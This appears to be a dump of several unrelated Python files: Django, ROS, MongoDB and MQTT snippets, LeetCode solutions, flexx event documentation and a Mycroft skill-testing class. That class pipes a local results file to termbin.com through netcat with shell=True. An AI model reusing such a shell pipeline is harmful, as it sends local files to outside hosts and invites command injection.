                ('subject', models.CharField(max_length=255)),
                ('created_on', models.DateTimeField(auto_now_add=True)),
                # NOTE(review): related_name='rareusers' / 'posts' look copied from
                # other models ('comments' would be conventional) — confirm before
                # relying on reverse lookups; changing it needs a new migration.
                ('author_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='rareusers', related_query_name='rareuser', to='rareserverapi.rareusers')),
                ('post_id', models.ForeignKey(blank=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts', related_query_name='post', to='rareserverapi.post')),
            ],
        ),
    ]
|
from utils import regex_utils
from utils.log_utils import log
class InsertProcessor:
    """Validate incoming regex payloads and store them as client-specific
    or global rules via the injected models."""

    def __init__(self, broker, client_model, global_model):
        self.broker = broker
        self.client_model = client_model
        self.global_model = global_model
        self.log = log

    def _is_client_regex(self, payload: dict):
        """Return True when the payload names a non-blank client.

        Returns False (previously an implicit None — both falsy, so callers
        are unaffected) when the payload is malformed.
        """
        try:
            return (payload['client'] is not None) and (not payload['client'].strip() == "")
        except Exception as e:
            self.log.error(f"Error on process payload {e}")
            return False

    def _is_valid_payload(self, payload):
        """A payload is valid when it has 'client' and 'regex' keys and the
        regex actually compiles."""
        required_fields = ['client', 'regex']
        has_required = len(set(required_fields) & set(payload.keys())) == len(required_fields)
        is_valid_regex = False
        if has_required:
            is_valid_regex = regex_utils.is_valid_regex(payload['regex'])
        return has_required and is_valid_regex

    def process(self, payload: dict):
        """Insert the regex at client or global scope.

        Returns the payload on success, None for invalid payloads.
        """
        if not self._is_valid_payload(payload):
            self.log.error('Invalid payload %s' % str(payload))
            return None
        regex = payload['regex']
        if self._is_client_regex(payload):
            # The models' return values were previously captured but unused.
            self.client_model.insert_client_regex(payload['client'], regex)
            self.log.info(f"Added new regex [client]: {payload}")
        else:
            self.global_model.insert_global_regex(regex)
            self.log.info(f"Added new regex [global]: {payload}")
        return payload
|
class Solution(object):
    """Counting sequences that sum to a target (LeetCode 377) and the
    related coin-change minimum (LeetCode 322)."""

    # DFS is O(2^n); with backtracking/pruning it is O(n!)~O(2^n).
    # The DFS solution can only handle small cases (target <= ~25 and
    # len(nums) <= ~5) due to the memory used by materializing `res`.
    def combinationSum4(self, nums, target):
        """
        :type nums: List[int]
        :type target: int
        :rtype: int  -- number of ordered sequences of nums summing to target
        """
        nums.sort()
        res = []
        self.dfs(nums, target, [], res)
        return len(res)

    def dfs(self, nums, target, path, res):
        """Enumerate ordered sequences depth-first, appending completed paths to res."""
        if target < 0:
            return
        if target == 0:
            res.append(path)
            return
        for i in range(len(nums)):
            # nums is sorted, so once one candidate overshoots the remaining
            # target, every later one does too — prune the branch.  (The
            # original sorted nums but never used the order here.)
            if nums[i] > target:
                break
            self.dfs(nums, target - nums[i], path + [nums[i]], res)

    ## when we only care about the count, it reduces to a simpler problem:
    ## basically the coin change problem.  O(nlogn + target*n)
    def combinationSum2(self, nums, target):
        """DP count of ordered sequences of nums summing to target."""
        nums.sort()
        dp = [0] * (target + 1)
        dp[0] = 1
        for i in range(1, target + 1):
            for num in nums:
                if num > i:  ## dp can prune the branch as well
                    break
                dp[i] += dp[i - num]
        return dp[target]

    ## coin change and combination sum IV share the same dp skeleton:
    ## general summary: how many / fewest numbers to reach a total.
    def coinChange(self, coins, amount):
        """
        :type coins: List[int]
        :type amount: int
        :rtype: int  -- fewest coins making `amount`, or -1 if impossible
        """
        MAX = float('inf')
        dp = [0] + [MAX] * amount
        coins.sort()  ## sorted so the inner loop can break early
        for i in range(1, amount + 1):
            for c in coins:
                if i - c >= 0:
                    dp[i] = min(dp[i], dp[i - c] + 1)
                else:
                    break
        return dp[-1] if dp[-1] != MAX else -1
"""Store today's Google Trends top-25 list (from MEME.lista) in MongoDB,
in a collection named after today's date."""
from datetime import date
from MEME import lista
from pymongo import MongoClient

fecha = date.today()
client = MongoClient('localhost', 27017)
db = client['Google_Trends']
tendencias = db[str(fecha)]
tendencia = {'Top 25': lista}
# Result object was previously bound to unused names (`mongo_data`,
# `insertado`); only the insert itself matters.
tendencias.insert_one(tendencia)
|
#!/usr/bin/env python
import rospy
import serial
from jsk_mbzirc_board.srv import *
from std_msgs.msg import Int16
class Serial_board:
    """Bridge between a serial-attached control board and ROS.

    Exposes a magnet-control service and republishes magnet feedback and
    point-laser distance readings parsed from the serial stream.
    """

    def __init__(self):
        # Protocol framing and stream markers.
        self.T_HEADER = 'TH'
        self.T_TAIL = 'TT'
        self.Magdata = 'mag:!'  # prefix of magnet feedback in incoming data
        # Defaults; each may be overridden by a ROS parameter below.
        self.port = '/dev/ttyTHS2'
        self.baud = 115200
        self.verbose = True
        self.serialtimeout = 0.01
        self.updaterate = 20  # 20hz
        # initialize the parameters
        self.port = rospy.get_param("~port", self.port)
        self.baud = rospy.get_param('~baud', self.baud)
        self.verbose = rospy.get_param('~verbose', self.verbose)
        self.serialtimeout = rospy.get_param('~serialtimeout', self.serialtimeout)
        self.updaterate = rospy.get_param('~updaterate', self.updaterate)
        rospy.loginfo("port is : %s" % self.port)
        rospy.loginfo("baudrate is: %s " % self.baud)
        self.ser = serial.Serial(self.port, self.baud, timeout=self.serialtimeout)
        # magnets service server
        self._srv_magnet = rospy.Service("/serial_board/magnet_control", Magnet, self.__Magnet_Service)
        # magnets switch publisher
        self._pub_magnet = rospy.Publisher("/serial_board/magnet_feedback", Int16, queue_size=1)
        # laser distance publisher
        self._pub_pointlaser = rospy.Publisher("/serial_board/point_laser", Int16, queue_size=1)

    def __del__(self):
        # Best-effort cleanup of the serial handle.
        self.ser.close()

    def __Magnet_Service(self, req):
        """Service handler: drive the magnet for req.time_ms milliseconds.

        Returns False for durations outside 0..65534 (the range the
        two-byte wire format can carry), True once the frame is sent.
        """
        time = req.time_ms
        # BUG FIX: the original used `and`, which can never be true, so
        # out-of-range requests were never rejected.
        if time > 65534 or time < 0:
            return False
        t_size = 3
        # Floor division keeps these values integers under Python 3 too.
        time_high8b = chr(time // 256)
        time_low8b = chr(time % 256)
        onoff = chr(req.on)
        # send on order and duration, low byte first
        datatosend = self.T_HEADER + chr(t_size) + onoff + time_low8b + time_high8b + self.T_TAIL
        self.ser.write(datatosend)
        return True

    def Serial_Update(self):
        """Poll the serial port at `updaterate` Hz until ROS shuts down,
        republishing any magnet feedback and laser distance found."""
        r = rospy.Rate(self.updaterate)
        while not rospy.is_shutdown():
            data_in = self.ser.readall()
            if data_in:
                if self.verbose:
                    rospy.loginfo(data_in)
                # data will be like mag:!5!#223#
                index = data_in.find(self.Magdata)
                if not (index < 0):
                    index += 5
                    self._pub_magnet.publish(int(data_in[index:data_in.find('!', index)]))
                # now get the distance
                index = data_in.find('!#')
                index += 2
                distbyte = data_in[index:data_in.find('#', index)]
                if distbyte:
                    rospy.loginfo(int(distbyte.strip('\0')))
                    self._pub_pointlaser.publish(int(distbyte.strip('\0')))
            r.sleep()
if __name__ == "__main__":
    # Bring up the ROS node and pump the serial read loop until shutdown.
    rospy.init_node('serial_board')
    ex = Serial_board()
    try:
        ex.Serial_Update()
    # ROSInterruptException just means rospy is shutting down — exit quietly.
    except rospy.ROSInterruptException: pass
|
"""Aggregate per-day vehicle counts from a CSV of
(countline, year, month, day, count) rows into a Date x countline table."""
import csv
import sys

days = {}        # date 'YYYYMMDD' -> {countline: count-as-string}
countlines = {}  # countline -> first date seen (only key order is used)

with open(sys.argv[1]) as csvfile:
    carsin = csv.reader(csvfile, delimiter=',')
    for row in carsin:
        countline = row[0]
        date = row[1] + row[2] + row[3]  # year + month + day
        count = row[4]
        if countline not in countlines:
            countlines[countline] = date
        if date not in days:
            days[date] = {}
        days[date][countline] = count

# Print a header line with the column names
print(",".join(["Date", "TOTAL"] + list(countlines)))

# Print a line-per-day containing Date, TOTAL, and a column for each countline
for date in days:
    total = 0
    line = ""
    for countline in countlines:
        # the 'count' from the input data is a string
        if countline not in days[date]:
            print("countline "+countline+" missing from "+date, file=sys.stderr)
            count = str(0)
        else:
            count = days[date][countline]
        total += int(count)
        line += "," + count
    print(date + "," + str(total) + line)
|
# MQTT broker connection settings.
# NOTE(review): the values look like placeholders — fill in real credentials
# and broker IP before use; consider loading secrets from the environment
# rather than committing them here.
mqtt = {
    'username': 'YourUsername',
    'password': 'YourPassword',
    'ip': '192.168.#.##',
    'port': 1883,
    'timeout': 60,
    # Topic map: logical names used by the app -> actual MQTT topic strings.
    'topic' :{
        'subscribe': {
            'topic_key': 'topic'
        },
        'publish': {
            'publish_key': 'topic'
        }
    }
}
|
"""
The event module provides a system for properties and events,
to let different components of an application react to each-other and
to user input.
In short:
* The :class:`Component <flexx.event.Component>` class provides a base class
which can be subclassed to create the different components of an app.
* Each component has :class:`properties <flexx.event.Property>` to reflect
the state of the component.
* Properties can only be mutated by :class:`actions <flexx.event.action>`.
Calling (i.e. invoking) an action will not apply the action at once; actions
are processed in batches.
* When properties are modified (i.e. the state is changed),
corresponding :class:`reactions <flexx.event.reaction>`
will be invoked. The reactions are processed when all pending actions
are done. This means that during processing reactions, the state never changes,
which is a great thing to rely on!
* Reactions can also react to events generated by :func:`emitters <flexx.event.emitter>`,
such as mouse events.
* The :class:`event loop <flexx.event.Loop>` object is responsible for scheduling
actions and reactions and can be used by the user to e.g. make a function be
  called later. It integrates with Python's own asyncio loop.
The asynchronous nature of actions combined with the fact that the state does
not change during processing reactions, makes it easy to reason about
cause and effect. The information flows in one direction. This concept was
gratefully taken from modern frameworks such as React/Flux and Vuex.
.. image:: https://docs.google.com/drawings/d/e/2PACX-1vSHp4iha6CTgjsQ52x77gn0hqQP4lZD-bcaVeCfRKhyMVtaLeuX5wpbgUGaIE0Sce_kBT9mqrfEgQxB/pub?w=503
One might suggest that the information flow is still circular, because there
is an arrow going from reactions to actions. This is true, but note that
actions invoked from reactions are not directly executed; they are pended and
will be executed only after all reactions are done.
Relation to other parts of Flexx
--------------------------------
This event system and its :class:`Component <flexx.event.Component>` class
form the basis for :class:`app.PyComponent <flexx.app.PyComponent>`,
:class:`app.JsComponent <flexx.app.JsComponent>` and the UI system
in ``flexx.ui``. It can be used in both Python and JavaScript and works exactly
the same in both languages.
Other than that, this is a generic event system that could drive any system
that is based on asyncio.
Event object
------------
An event is something that has occurred at a certain moment in time,
such as the mouse being pressed down or a property changing its value.
In Flexx, events are represented with dictionary objects that
provide information about the event (such as what button was pressed,
or the old and new value of a property). A custom :class:`Dict <flexx.event.Dict>`
class is used that inherits from ``dict`` but allows attribute access,
e.g. ``ev.button`` as an alternative to ``ev['button']``.
Each event object has at least two attributes: ``source``,
a reference to the Component object emitting the event, and ``type``, a string
indicating the type of the event.
The Component class
-------------------
The :class:`Component <flexx.event.Component>` class provides a base
class for objects that have properties, actions, reactions and emitters.
E.g. ``flexx.ui.Widget`` inherits from ``flexx.app.JsComponent``,
which inherits from ``flexx.event.Component``.
.. code-block:: python
class MyObject(event.Component):
... # attributes/properties/actions/reactions/emitters go here
def init(self):
super().init()
...
It is common to implement the ``init()`` method of the component class. It gets
automatically called by the component, at a moment when all properties have
been initialized, but no events have been emitted yet. This is a good time
to further initialize the component, and/or to instantiate sub components.
One rarely needs to implement the ``__init__()`` method.
When the ``init()`` is called, the component is the currently "active"
component, which can be used to e.g. describe a hierarchy of objects, as is
done with widgets. It also implies that mutations are allowed and that actions
on the component itself have a direct effect (invoking actions of other
components is still asynchronous though).
Properties represent state
--------------------------
:class:`Properties <flexx.event.Property>` can be defined using one of
the several property classes. For example:
.. code-block:: python
class MyObject(event.Component):
foo = event.AnyProp(8, settable=True, doc='can have any value')
bar = event.IntProp()
Properties accept one positional arguments to set the default value. If not
given, a sensible default value is used that depends on the type of property.
The ``foo`` property above is marked as settable, so that the class will have
a ``set_foo()`` action. Docs can be added too. Note that properties
are readonly: they can only be mutated by actions.
Property values can be initialized when a component is created (also
non-settable properties):
.. code-block:: python
c = MyComponent(foo=42)
One can also set the initial value of a property to a function object.
This creates an auto-reaction that sets the property, and makes it possible
to hook things up in a very concise manner. In the example below, the label
text will be automatically updated when the username property changes:
.. code-block:: python
c = UiLabel(text=lambda: self.username)
An event is emitted every time that a property changes. This event has attributes
``old_value`` and ``new_value`` (except for in-place array mutations, as
explained below). At initialization, a component sends out an event for each property,
which has the same value for ``old_value`` and ``new_value``.
Component classes can also have :class:`Attributes <flexx.event.Attribute>`,
which are read-only (usually static) non-observable values (e.g. ``JsComponent.id``).
Actions can mutate properties
-----------------------------
:class:`Actions <flexx.event.action>` can be defined to mutate properties:
.. code-block:: python
class MyObject(event.Component):
foo = event.AnyProp(8, settable=True, doc='can have any value')
bar = event.IntProp()
@event.action
def increase_bar(self):
self._mutate_bar(self.bar + 1)
# shorthand for self._mutate('bar', self.bar + 1)
Actions can have any number of (positional) arguments. Note that actions are
asynchronous, i.e. calling an action will not apply it immediately, unless it is
called from another action.
Since actions are asynchronous, their inner function should not return a value.
Invoking (i.e. calling) an action always returns the component itself, which
allows chaining action invocations, e.g. ``t.scale(3).translate(3, 4)``
Mutations are done via the :func:`_mutate <flexx.event.Component._mutate>` method,
or by the auto-generated ``_mutate_xx()`` methods.
Mutations can only be done from an action. Trying
to do so otherwise will result in an error. This may seem limiting at first,
but it greatly helps keeping it easy to reason about information flowing
through your application, even as it scales.
Mutations to array-like properties
----------------------------------
The above shows the simple and most common use of mutations. For list
properties, mutations can also be done in-place:
.. code-block:: python
class MyObject(event.Component):
items = event.ListProp()
def add_item(self, item):
self._mutate_items([item], 'insert', len(self.items))
This allows more fine-grained control over state updates, which can also
be handled by reactions in much more efficient ways. The types of mutations are
'set' (the default), 'insert', 'replace', and 'remove'. In the latter, the
provided value is the number of elements to remove. For the others it must
be a list of elements to set/insert/replace at the specified index.
Emitters create events
----------------------
:func:`Emitters <flexx.event.emitter>` make it easy to generate events.
Similar to actions, they are created with a decorator.
.. code-block:: python
class MyObject(event.Component):
@event.emitter
def pointer_down(self, js_event):
''' Event emitted when the mouse/touchpad/screen is pressed.
'''
return dict(button=js_event.button)
Emitters can have any number of arguments and should return a dictionary,
which will get emitted as an event, with the event type matching the name
of the emitter.
Note that stricly speaking emitters are not necessary as ``Component.emit()``
can be used to generate an event. However, they provide a mechanism to
generate an event based on certain input data, and also document the
events that a component may emit.
Reactions
---------
:func:`Reactions <flexx.event.reaction>` are used to react to events and
changes in properties, using an underlying handler function:
.. code-block:: python
class MyObject(event.Component):
first_name = event.StringProp(settable=True)
last_name = event.StringProp(settable=True)
@event.reaction('first_name', 'last_name')
def greet(self, *events):
print('hi', self.first_name, self.last_name)
@event.reaction('!foo')
def handle_foo(self, *events):
for ev in events:
print(ev)
This example demonstrates multiple concepts. Firstly, the reactions are
connected via *connection-strings* that specify the types of the
event; in this case the ``greeter`` reaction is connected to "first_name" and
"last_name", and ``handle_foo`` is connected to the event-type "foo" of the
object. This connection-string can also be a path, e.g.
"sub.subsub.event_type". This allows for some powerful mechanics, as
discussed in the section on dynamism.
One can also see that the reaction-function accepts ``*events`` argument.
This is because reactions can be passed zero or more events. If a reaction
is called manually (e.g. ``ob.handle_foo()``) it will have zero events.
When called by the event system, it will have at least 1 event. When
e.g. a property is set twice, the function will be called
just once, but with multiple events. If all events need to be processed
individually, use ``for ev in events: ...``.
In most cases, you will connect to events that are known beforehand,
like those corresponding to properties and emitters.
If you connect to an event that is not known (like "foo" in the example
above) Flexx will display a warning. Use ``'!foo'`` as a connection string
(i.e. prepend an exclamation mark) to suppress such warnings.
Another useful feature of the event system is that a reaction can connect to
multiple events at once, as the ``greet`` reaction does.
The following is less common, but it is possible to create a reaction from a
normal function, by using the
:func:`Component.reaction() <flexx.event.Component.reaction>` method:
.. code-block:: python
c = MyComponent()
# Using a decorator
@c.reaction('foo', 'bar')
def handle_func1(self, *events):
print(events)
# Explicit notation
def handle_func2(self, *events):
print(events)
c.reaction(handle_func2, 'foo', 'bar')
# this is fine too: c.reaction('foo', 'bar', handle_func2)
Greedy and automatic reactions
==============================
Each reaction operates in a certain "mode". In mode "normal", the event system
ensures that all events are handled in the order that they were emitted. This
is often the most useful approach, but this implies that a reaction can be
called multiple times during a single event loop iteration, with other
reactions called in between to ensure the consistent event order.
If it is preferred that all events targeted at a reaction are handled with
a single call to that reaction, it can be set to mode "greedy". Cases where
this makes sense is when all related events must be processed simultaneously,
or simply when performance matters a lot and order matters less.
Reactions with mode "auto" are automatically triggered when any of the
properties that the reaction uses is changed. Such reactions can be
created by specifying the ``mode`` argument, or simply by creating a
reaction with zero connections strings. We refer to such reactions as
"auto reactions" or "implicit reactions". This is a convenient feature,
but should probably be avoided when a lot (say hundreds) of properties
are accessed.
.. code-block:: python
class MyObject(event.Component):
first_name = event.StringProp(settable=True)
last_name = event.StringProp(settable=True)
@event.reaction
def greet(self):
print('hi', self.first_name, self.last_name)
A similar useful feature is to assign a property (at initialization) using a
function. In such a case, the function is turned into an implicit reaction.
This can be convenient to easily connect different parts of an app.
.. code-block:: python
class MyObject(event.Component):
first_name = event.StringProp(settable=True)
last_name = event.StringProp(settable=True)
person = MyObject()
label = UiLabel(text=lambda: person.first_name)
Reacting to in-place mutations
==============================
In-place mutations to lists or arrays can be reacted to by processing
the events one by one:
.. code-block:: python
class MyComponent(event.Component):
@event.reaction('other.items')
def track_array(self, *events):
for ev in events:
if ev.mutation == 'set':
self.items[:] = ev.objects
elif ev.mutation == 'insert':
self.items[ev.index:ev.index] = ev.objects
elif ev.mutation == 'remove':
self.items[ev.index:ev.index+ev.objects] = [] # objects is int here
elif ev.mutation == 'replace':
self.items[ev.index:ev.index+len(ev.objects)] = ev.objects
else:
assert False, 'we cover all mutations'
For convenience, the mutation can also be "replicated" using the
``flexx.event.mutate_array()`` and ``flexx.event.mutate_dict()`` functions.
Connection string syntax
========================
The strings used to connect events follow a few simple syntax rules:
* Connection strings consist of parts separated by dots, thus forming a path.
If an element on the path is a property, the connection will automatically
reset when that property changes (a.k.a. dynamism, more on this below).
* Each part can end with one star ('*'), indicating that the part is a list
and that a connection should be made for each item in the list.
* With two stars, the connection is made *recursively*, e.g. "children**"
connects to "children" and the children's children, etc.
* Stripped of '*', each part must be a valid identifier (ASCII).
* The total string optionally has a label suffix separated by a colon. The
label itself may consist of any characters.
* The string can have a "!" at the very start to suppress warnings for
connections to event types that Flexx is not aware of at initialization
time (i.e. not corresponding to a property or emitter).
An extreme example could be ``"!foo.children**.text:mylabel"``, which connects
to the "text" event of the children (and their children, and their children's
children etc.) of the ``foo`` attribute. The "!" is common in cases like
this to suppress warnings if not all children have a ``text`` event/property.
Labels
======
Labels are a feature that makes it possible to influence the order by
which reactions are called, and provide a means to disconnect
specific (groups of) handlers.
.. code-block:: python
class MyObject(event.Component):
@event.reaction('foo')
def given_foo_handler(*events):
...
@event.reaction('foo:aa')
def my_foo_handler(*events):
# This one is called first: 'aa' < 'given_f...'
...
When an event is emitted, any connected reactions are scheduled in the
order of a key, which is the label if present, and
otherwise the name of the reaction.
The label can also be used in the
:func:`disconnect() <flexx.event.Component.disconnect>` method:
.. code-block:: python
@h.reaction('foo:mylabel')
def handle_foo(*events):
...
...
h.disconnect('foo:mylabel') # don't need reference to handle_foo
Dynamism
========
Dynamism is a concept that allows one to connect to events for which
the source can change. For the following example, assume that ``Node``
is a ``Component`` subclass that has properties ``parent`` and
``children``.
.. code-block:: python
main = Node()
main.parent = Node()
main.children = Node(), Node()
@main.reaction('parent.foo')
def parent_foo_handler(*events):
...
@main.reaction('children*.foo')
def children_foo_handler(*events):
...
The ``parent_foo_handler`` gets invoked when the "foo" event gets
emitted on the parent of main. Similarly, the ``children_foo_handler``
gets invoked when any of the children emits its "foo" event. Note that
in some cases you might also want to connect to changes of the ``parent``
or ``children`` property itself.
The event system automatically reconnects reactions when necessary. This
concept makes it very easy to connect to the right events without the
need for a lot of boilerplate code.
Note that the above example would also work if ``parent`` would be a
regular attribute instead of a property, but the reaction would not be
automatically reconnected when it changed.
Implicit dynamism
=================
Implicit reactions are also dynamic, maybe even more so! In the example below,
the reaction accesses the ``children`` property, thus it will be called whenever
that property changes. It also connects to the ``visible`` event of
all children, and to the ``foo`` event of all children that are visible.
.. code-block:: python
@main.reaction
def _implicit_reacion():
for child in main.children:
if child.visible:
do_something_with(child.foo)
This mechanism is powerful, but one can see how it can potentially
access (and thus connect to) many properties, especially if the reaction
calls other functions that access more properties. Also keep in mind that
implicit reactions have more overhead (because they fully reconnect
every time after they are called). One should probably avoid them for
properties that change 100 times per second.
Patterns
--------
The event system presented here is quite flexible and designed to cover the needs
of a variety of event/messaging mechanisms. This section discusses
how this system relates to some common patterns, and how these can be
implemented.
Observer pattern
================
The idea of the observer pattern is that observers keep track (the state
of) of an object, and that an object is agnostic about what it's tracked by.
For example, in a music player, instead of writing code to update the
window-title inside the function that starts a song, there would be a
concept of a "current song", and the window would listen for changes to
the current song to update the title when it changes.
In ``flexx.event``, a ``Component`` object keeps track of its observers
(reactions) and notifies them when there are changes. In our music player
example, there would be a property "current_song", and a reaction to
take action when it changes.
As is common in the observer pattern, the reactions keep track of the
objects that they observe. Therefore both ``Reaction`` and ``Component``
objects have a ``dispose()`` method for cleaning up.
Signals and slots
=================
The Qt GUI toolkit makes use of a mechanism called "signals and slots" as
an easy way to connect different components of an application. In
``flexx.event`` signals translate to properties and associated setter actions,
and slots to the reactions that connect to them.
Although signals and slots provide a convenient mechanism, they make it easy
to create "spaghetti apps" where the information flows all over the place,
which is exactly what frameworks like Flux, Vuex and Flexx try to overcome.
Overloadable event handlers
===========================
In Qt, the "event system" consists of methods that handles an event, which
can be overloaded in subclasses to handle an event differently. In
``flexx.event``, actions and reactions can similarly be re-implemented in
subclasses, and these can call the original handler using ``super()`` if needed.
Publish-subscribe pattern
==========================
In pub-sub, publishers generate messages identified by a 'topic', and
subscribers can subscribe to such topics. There can be zero or more publishers
and zero or more subscribers to any topic.
In ``flexx.event`` a `Component` object can play the role of a broker.
Publishers can simply emit events. The event type represents the message
topic. Subscribers are represented by handlers.
"""
import logging
# Package-level logger; the `logging` name itself is deleted below so it
# does not leak into the public `flexx.event` namespace.
logger = logging.getLogger(__name__)
del logging
import sys
# Hard version requirement checked at import time.
# NOTE(review): `assert` is stripped under `python -O`; an explicit raise
# would be more robust — confirm before changing, callers may rely on it.
assert sys.version_info > (3, 5), "Flexx.event needs Python 3.5+"
del sys
# flake8: noqa
from ._dict import Dict
from ._loop import Loop, loop
from ._action import Action, action
from ._reaction import Reaction, reaction
from ._emitter import emitter, Emitter
from ._attribute import Attribute
from ._property import *
from ._component import Component, mutate_array, mutate_dict
|
import copy
import csv
import json
import os
from os.path import join
import time
from datetime import datetime
from subprocess import check_output, Popen
from time import sleep
from mycroft import MycroftSkill, intent_file_handler
from mycroft.api import DeviceApi
from mycroft.configuration import Configuration
from mycroft.messagebus.message import Message
from mycroft.util.format import nice_duration
class SkillTesting(MycroftSkill):
    """Batch-runs a list of test phrases against a live Mycroft instance.

    Each configured utterance is injected as a simulated
    ``recognizer_loop:utterance`` message.  Bus listeners then time how long
    the intent handler, the spoken (text) response and the audio output take.
    Results are written to a CSV file, uploaded to termbin, and emailed to
    the device owner.  Further intents can generate intent-test JSON files
    from the results, run them, and remove them again.
    """

    def __init__(self):
        MycroftSkill.__init__(self)
        self.reset_test_env()

    def initialize(self):
        """Set up paths once the Skill's filesystem/settings are available."""
        self.update_settings()
        # BUG FIX: was `get_skills_dir()` (a bare name), which raised
        # NameError at runtime because the function is defined on the class.
        self.file_path_base = self.get_skills_dir()
        self.file_path_reading_output = '/'.join([self.file_system.path,
                                                  'reading-output'])
        if not os.path.isdir(self.file_path_reading_output):
            os.mkdir(self.file_path_reading_output)
        # Relative path inside a Skill directory where intent tests live.
        self.file_path_test = 'test/intent'

    def update_settings(self):
        """Refresh the utterance list and inter-test delay from settings.

        Remote (home.mycroft.ai) phrases take precedence; otherwise fall
        back to a local ``utterances.csv`` in the Skill's data directory.
        """
        self.input_utterances = False
        self.test_identifier = self.settings.get('test_identifier')
        remote_phrases = self.settings.get('phrases')
        if remote_phrases is not None:
            self.input_utterances = list(csv.reader([remote_phrases],
                                         skipinitialspace=True))[0]
        if not self.input_utterances:
            self.log.info('No remote phrases, reading local')
            try:
                local_phrases = os.path.join(
                    self.file_system.path,
                    'utterances.csv'
                )
                with open(local_phrases) as f:
                    reader = list(csv.reader(f))
                # One row -> one phrase per cell; several rows -> one phrase
                # in the first cell of each row.
                if len(reader) == 1:
                    utterances = reader[0]
                else:
                    utterances = [i[0] for i in reader]
                self.input_utterances = [x.strip() for x in utterances]
            except FileNotFoundError:
                self.log.exception('No remote or local utterances found')
        else:
            self.log.info('Using remote phrases')
        self.delay = int(self.settings.get('delay', '30'))

    @intent_file_handler('read.utterances.intent')
    def read_utterances(self, message):
        """Run the full batch of test phrases through the recognizer loop."""
        self.update_settings()
        sleep(10)
        if not self.input_utterances:
            self.speak_dialog('reading.no.utterances')
            return
        num_tests = len(self.input_utterances)
        self.log.debug('Running {} tests.'.format(num_tests))
        avg_response_time = 5
        estimated_length = nice_duration(self.delay * 2 + num_tests * (
            self.delay + avg_response_time))
        self.speak_dialog('reading.started',
                          data={'num': num_tests,
                                'estimated_length': estimated_length})
        sleep(self.delay)
        # Add extra utterance to call final code
        # Why? Workaround as code in handler after phrase loop doesn't execute
        self.input_utterances.append(self.translate('trigger.reading.complete'))
        self.add_event('mycroft.skill.handler.start', self.detect_handler)
        self.add_event('speak', self.detect_response)
        self.add_event('recognizer_loop:audio_output_start',
                       self.detect_audio_out)
        self.add_event('recognizer_loop:record_begin', self.attempt_response)
        for i, phrase in enumerate(self.input_utterances):
            # If a previous single result exists, add it to output and reset.
            if self.test_result:
                self.all_test_results.append(self.test_result)
                self.test_result = []
            self.responses = []
            # Strip white space and text delimiters.
            phrase = phrase.strip().strip('"').strip()
            # Extract any responses required for intent eg set timer>10 minutes
            if '>' in phrase:
                phrase, *self.responses = phrase.split('>')
                self.log.debug("self.responses: {}".format(self.responses))
            # If not the last, as the last utterance triggers completion.
            if i < len(self.input_utterances) - 1:
                self.test_result.append(phrase)
            self.test_start_time = time.time()
            self.bus.emit(Message("recognizer_loop:utterance",
                                  {'utterances': [phrase],
                                   'lang': 'en-us'}))
            sleep(self.delay)

    def detect_handler(self, m):
        """Record which Skill/intent handled the current phrase."""
        tick = time.time()
        handler_message_data = json.loads(m.serialize())['data']
        self.log.debug('Detected Skill handler: {}'.format(
            handler_message_data))
        keys = handler_message_data.keys()
        # Normal Skills
        if 'name' in keys:
            name, intent = handler_message_data['name'].split('.')
            # Ignore handlers triggered by this testing Skill itself.
            if name == 'SkillTesting':
                return
        # Fallback handler
        elif 'handler' in keys and len(self.test_result) == 1:
            name, intent = ('Fallback', 'No intent triggered')
        else:
            # Neither a normal handler nor a fallback we care about.
            # (Removed dead `name, intent = (False, False)` before return.)
            return
        self.test_result = [self.test_result[0], name, intent,
                            self._get_timer_interval(tick)]

    def detect_response(self, m):
        """Record Mycroft's spoken (text) response and its timing."""
        tick = time.time()
        message_data = json.loads(m.serialize())['data']
        self.log.debug('Detected spoken response: {}'.format(message_data))
        if 'utterance' in message_data.keys() and \
                message_data['utterance'] != self.translate('reading.complete'):
            # Only the phrase itself recorded => no handler fired first.
            if len(self.test_result) == 1:
                self.test_result.extend(('FAILED', 'FAILED',
                                         message_data['utterance']))
            else:
                self.test_result.append((message_data['utterance']))
            if len(self.test_result) == 5:
                self.test_result.insert(4, self._get_timer_interval(tick))

    def detect_audio_out(self, m):
        """Record the time until audible output starts."""
        tick = time.time()
        message_data = json.loads(m.serialize())['data']
        self.log.debug('Detected audio output start: {}'.format(message_data))
        if len(self.test_result) == 6:
            self.test_result.insert(5, self._get_timer_interval(tick))

    def attempt_response(self, m):
        """When the mic opens, speak the next queued follow-up response."""
        if self.responses:
            this_response = self.responses.pop(0)
            sleep(1)
            self.bus.emit(Message("recognizer_loop:utterance",
                                  {'utterances': [this_response],
                                   'lang': 'en-us'}))
            self.test_result.append(this_response)

    def _get_timer_interval(self, tick):
        """Seconds elapsed since the current phrase was emitted, to 1 ms."""
        duration = tick - self.test_start_time
        return int(duration * 1000) / 1000

    @intent_file_handler('reading.complete.intent')
    def handle_reading_complete(self, message):
        """Finish a run: detach listeners, save, upload and email results."""
        sleep(self.delay)
        self.remove_event('mycroft.skill.handler.start')
        self.remove_event('speak')
        self.remove_event('recognizer_loop:audio_output_start')
        # BUG FIX: this listener (added in read_utterances) was never removed.
        self.remove_event('recognizer_loop:record_begin')
        self.speak_dialog('reading.complete')
        # Save locally to potentially generate tests from.
        # Remove unsupported characters from filename.
        if self.test_identifier in (None, ''):
            self.test_identifier = datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
        file_name = ''.join(
            x for x in self.test_identifier
            if (x.isalnum() or x in "._-")) + '.csv'
        # TODO Actually track which output files are created and manage them
        self.output_file = '/'.join([self.file_path_reading_output, file_name])
        with open(self.output_file, 'w') as f:
            writer = csv.writer(f, quoting=csv.QUOTE_ALL)
            writer.writerows(self.all_test_results)
        # Upload to Termbin.  NOTE(review): shell pipeline; file_name is
        # sanitized above, but confirm file_path_reading_output is trusted.
        upload_cmd = 'cat ' + self.output_file + ' | nc termbin.com 9999'
        url = check_output(upload_cmd, shell=True).decode().strip('\n\x00')
        # Email results to the registered user.
        data = {
            'test_identifier': self.test_identifier,
            'url': url,
            'device_name': self.get_device_name(),
            'num_tests': len(self.all_test_results) - 1
        }
        email = '\n'.join(self.translate_template('phrase.results.email', data))
        subject = self.translate('phrase.results.email.subject', data)
        self.send_email(subject, email)
        # Reset variables and finish.
        self.reset_test_env()

    def reset_test_env(self):
        """Reset per-run state; first row of the results is the CSV header."""
        self.all_test_results = [['Utterance', 'Skill', 'IntentHandler',
                                  'TimeToIntent', 'TimeToTextRes',
                                  'TimeToAudioRes', 'Responses']]
